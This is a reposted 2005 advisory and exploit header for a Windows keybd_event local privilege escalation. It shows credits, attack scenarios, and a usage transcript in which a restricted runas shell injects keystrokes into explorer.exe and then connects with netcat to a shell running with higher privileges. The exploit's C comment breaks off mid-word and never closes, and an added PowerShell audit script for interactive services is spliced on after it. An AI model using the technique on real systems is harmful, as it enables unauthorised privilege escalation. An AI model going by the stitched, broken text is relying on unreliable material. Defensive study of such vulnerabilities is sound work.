Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

    Compiled by: 天天安全网   Author: anonymous   Published: 2005-09-09

    Vulnerability reference: http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
    Severity: Medium
    Affected: Microsoft Windows 2000/XP/2003
    Fix: no vendor solution available at the time of writing

    ------------------------------------------------------------------------------

    /*
    * Microsoft Windows keybd_event validation vulnerability.
    * Local privilege elevation
    *
    * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
    * Iñaki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
    *
    * Platforms affected/tested:
    *
    * - Windows 2000
    * - Windows XP
    * - Windows 2003
    *
    *
    * Original Advisory: http://www.haxorcitos.com
    * http://www.reversing.org
    *
    * Exploit Date: 08 / 06 / 2005
    *
    * Original Advisory:
    * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
    * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
    * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
    *
    * Attack Scenario:
    *
    * a) An attacker who gains access to an unprivileged shell or application
    * launched with runas.
    * b) An attacker who gains access to a service running with the
    * INTERACT_WITH_DESKTOP flag (a service allowed to interact with the desktop).
    *
    * Impact:
    *
    * Because keyboard input is not properly validated, it is possible to send
    * keystrokes to any application on the desktop.
    * By sending shortcut keys it is possible to execute code and elevate privileges,
    * obtaining the logged-on user's privileges and bypassing the runas/service
    * security restrictions.
    *
    * Exploit usage:
    *
    * C:\>whoami
    * AQUARIUS\Administrador
    *
    * C:\>runas /user:restricted cmd.exe
    * Enter the password for restricted:
    * Attempting to start cmd.exe as user "AQUARIUS\restricted" ...
    *
    *
    * Microsoft Windows 2000 [Version 5.00.2195]
    * (C) Copyright 1985-2000 Microsoft Corp.
    *
    * C:\WINNT\system32>cd \
    *
    * C:\>whoami
    * AQUARIUS\restricted
    *
    * C:\>tlist.exe |find "explorer.exe"
    * 1140 explorer.exe Program Manager
    *
    * C:\>c:\keybd.exe 1140
    * HANDLE Found. Attacking =)
    *
    * C:\>nc localhost 65535
    * Microsoft Windows 2000 [Versi
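The advisory's attack scenario (b) depends on a service being allowed to interact with the desktop, which puts the service's windows on the same interactive desktop as the attacker's keystrokes. The following audit script is an added example written for this page; it is not part of the advisory or of the exploit. It assumes an elevated PowerShell session on the Windows host being checked; the `Win32_Service.DesktopInteract` property, the `SERVICE_INTERACTIVE_PROCESS` (0x100) bit of each service's registry `Type` value, and the `NoInteractiveServices` value are standard Windows items, not something introduced by the advisory.

```powershell
# Added example (not from the advisory): find services that are allowed to
# interact with the desktop, i.e. candidates for attack scenario (b) above.
# Assumes an elevated PowerShell session on the host being audited.

$svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$SERVICE_INTERACTIVE_PROCESS = 0x100   # bit in the service Type value

# 1. What the Service Control Manager reports via WMI/CIM.
$interactive = Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.DesktopInteract } |
    Select-Object Name, StartName, State, PathName

# 2. Cross-check the raw Type flag in the registry, which also catches
#    services the CIM query could not enumerate.
$flagged = foreach ($key in Get-ChildItem -Path $svcRoot -ErrorAction SilentlyContinue) {
    $type = (Get-ItemProperty -Path $key.PSPath -Name Type -ErrorAction SilentlyContinue).Type
    if ($type -and ($type -band $SERVICE_INTERACTIVE_PROCESS)) {
        [pscustomobject]@{ Name = $key.PSChildName; Type = ('0x{0:x}' -f $type) }
    }
}

# 3. Does the OS block interactive services at all? The NoInteractiveServices
#    value exists on Vista/Server 2008 and later; it is absent on the
#    2000/XP/2003 versions listed in the advisory.
$nis = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows' `
        -Name NoInteractiveServices -ErrorAction SilentlyContinue

"Services marked DesktopInteract (CIM):"
$interactive | Format-Table -AutoSize
"Services with SERVICE_INTERACTIVE_PROCESS (0x100) in registry Type:"
$flagged | Format-Table -AutoSize
if ($null -eq $nis) {
    "NoInteractiveServices not present: this OS does not block interactive services."
} else {
    "NoInteractiveServices = $($nis.NoInteractiveServices) (1 = interactive services blocked)"
}
```

Any service listed by either query and running as LocalSystem is exposed to exactly the keystroke injection the advisory describes, and the fix on the affected platforms is to remove the "interact with desktop" setting (or move the UI into a separate per-user process). Scenario (a), a runas child on the same desktop, has no configuration switch on Windows 2000/XP/2003; it is addressed on Windows Vista and later by session 0 isolation for services and by User Interface Privilege Isolation, which stops a lower-integrity process from sending input to higher-integrity windows.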

Original URL: https://www.cnblogs.com/AloneSword/p/2237664.html